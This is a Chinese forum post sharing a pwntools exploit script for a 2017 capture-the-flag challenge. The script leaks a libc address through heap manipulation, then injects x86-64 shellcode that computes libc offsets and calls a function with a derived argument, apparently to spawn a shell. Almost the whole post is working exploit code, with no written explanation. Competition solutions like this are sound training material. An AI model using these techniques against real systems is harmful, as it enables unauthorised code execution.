[原创]CTF2017 第七题

2017-11-7 11:12

先贴 exploit 脚本，思路后边补上。

from pwn import *
import time
import re

libcbase = 0

# Verbose pwntools I/O logging for the whole session.
context.log_level = 'debug'

# Local-process variant left commented out by the author; the script talks to the
# challenge endpoint given in the write-up.
#t = process('./pwn')
HOST, PORT = '123.206.22.95', 8888
t = remote(HOST, PORT)


def CreateItemChunk():
    """Send menu option 4 repeatedly until the server reports an item to pick up.

    Replies are read line by line: a line containing "pick up" is answered with
    "y" and the function returns; a line containing "nothing found" ends the
    current attempt and another "4" is sent. Every attempt is followed by a
    one-second pause. (The author's note: chunk size 0x50.)
    """
    picked = False
    while not picked:
        t.sendline("4")
        while True:
            reply = t.recvline()
            if "pick up" in reply:
                t.sendline("y")
                picked = True
                break
            if "nothing found" in reply:
                break
        # NOTE(review): leading whitespace was lost in the pasted listing; the pause
        # is assumed to sit inside the retry loop (so it also runs once after success).
        time.sleep(1)
#elif(string.find("nothing found") != -1 ):


def DelItemChunk(n):
    """Delete item number *n* via menu option 2, confirming both follow-up prompts with '1'.

    Args:
        n: item index as shown by the server's menu; sent as its decimal string.
    """
    # (reply to send, prompt to wait for afterwards)
    dialogue = [
        ("2", "Your Choice:"),
        (str(n), "2.return"),
        ('1', "2.return"),
    ]
    for reply, prompt in dialogue:
        t.sendline(reply)
        t.recvuntil(prompt)
    t.sendline('1')


def GetRandAddr():
    """Read reply lines until one containing "No.2 error * " appears and return its 4th field as an int.

    Every line received is echoed to stdout. Returns 0 if the "Your Choice:" menu
    prompt shows up before such a line. (The author's note: chunk size 0x50.)
    """
    while True:
        line = t.recvline()
        print(line)
        if "No.2 error * " in line:
            # Split on single spaces and newlines; the value sits in field index 3.
            fields = re.split(r" |\n", line)
            print(fields[3])
            return int(fields[3])
        if "Your Choice:" in line:
            return 0


# Password field is filled with the 8-byte little-endian encoding of 0x605048,
# for both registration and login.
PASSWORD = p64(0x605048)

# (prompt to wait for, reply to send): register, log in, create one item.
_setup_dialogue = [
    ("==============================", '2'),   # register
    ("username", "xiaohang1"),
    ("password", PASSWORD),
    ("character's name", "chickendinner"),
    ("==============================", '1'),   # log in
    ("username:", "xiaohang1"),
    ("password:", PASSWORD),
    ("0.exit", "5"),                            # new item
    ("name:", "ShowMeTheMoney"),
    ("content:", "a" * 0x10),
]
for prompt, reply in _setup_dialogue:
    t.recvuntil(prompt)
    t.sendline(reply)
t.recvuntil("0.exit")

# select base (author's comment)
t.sendline("3")
t.sendline("1")
t.recvuntil("0.exit")


def _write_item_content(body):
    """Menu option 5: submit *body* as the new item's content and wait for the menu to return."""
    t.sendline("5")
    t.recvuntil("content:")
    t.sendline(body)
    t.recvuntil("0.exit")


# Prefix shared by the two content writes below; only the trailing 8-byte value differs.
_content_prefix = "a" * 0x20 + p64(1) + p64(0x40) + p64(1) + p64(0x28) + p64(1)

CreateItemChunk()
t.recvuntil("0.exit")
_write_item_content(_content_prefix + p64(0x0605078))

t.sendline("2")  # show rand() address (author's comment)
randAddr = GetRandAddr()
# NOTE(review): indentation was lost in the paste; only the message and the
# interactive() call are assumed to belong to the failure branch.
if randAddr == 0:
    print("can't get rand() address")
    t.interactive()
print("rand address : %x\n" % randAddr)

t.sendline("9")
t.recvuntil("0.exit")

_write_item_content(_content_prefix + p64(0x0605080))

DelItemChunk(1)
t.recvuntil("0.exit")

# 59 create/delete rounds, paced one second apart.
for _ in range(59):
    CreateItemChunk()
    time.sleep(1)
    DelItemChunk(2)

# Earlier variant of the final payload, kept by the author as a bare string
# literal; it is never executed or referenced by the rest of the script.
'''
asmstr = asm(shellcraft.amd64.mov('rbx', randAddr),arch = 'amd64', os = 'linux')
asmstr += asm(shellcraft.amd64.mov('rax', 0x694c204320554e47),arch = 'amd64', os = 'linux')
asmstr += asm("cmp rax,[rbx]",arch = 'amd64', os = 'linux')
asmstr += "\x74\x05"
asmstr += asm("inc rbx",arch = 'amd64', os = 'linux')
asmstr += "\x75\xf6"
asmstr += asm("mov rdi,rbx",arch = 'amd64', os = 'linux')
asmstr += asm("call [0x0605018]",arch = 'amd64', os = 'linux') # put
asmstr += asm("mov rsi,rbx",arch = 'amd64', os = 'linux')
asmstr += asm("mov rdi , 0x0403618",arch = 'amd64', os = 'linux')
asmstr += asm("mov rax , 0",arch = 'amd64', os = 'linux')
asmstr += asm("call [0x0605038]",arch = 'amd64', os = 'linux') # print

asmstr += asm("add rsp, 0x98",arch = 'amd64', os = 'linux')
asmstr += asm("pop rbp",arch = 'amd64', os = 'linux')
asmstr += asm("ret",arch = 'amd64', os = 'linux')


t.sendline("5")
t.recvuntil("content:")
t.sendline("a"*0x70 + asmstr)
t.recvuntil("0.exit")
'''
#shellcraft.amd64.mov('rbx', 0x694c204320554e47).rstrip()
#t.interactive()

def _amd64(code):
    """Assemble *code* with the fixed arch/os the script uses throughout."""
    return asm(code, arch='amd64', os='linux')


# Each piece is assembled separately, exactly as the author did, then concatenated.
_pieces = [
    _amd64(shellcraft.amd64.mov('rbx', randAddr)),
    _amd64("mov rdi , rbx"),
    _amd64("add rdi , 0x151DB7"),
    _amd64("add rbx , 0xA430"),
    _amd64("call rbx"),
]
asmstr = b"".join(_pieces)

t.sendline("5")
t.recvuntil("content:")
t.sendline("a" * 0x70 + asmstr)
t.recvuntil("0.exit")
t.interactive()


支持
2018-4-20 22:08
排版不好看啊.
2019-1-26 22:06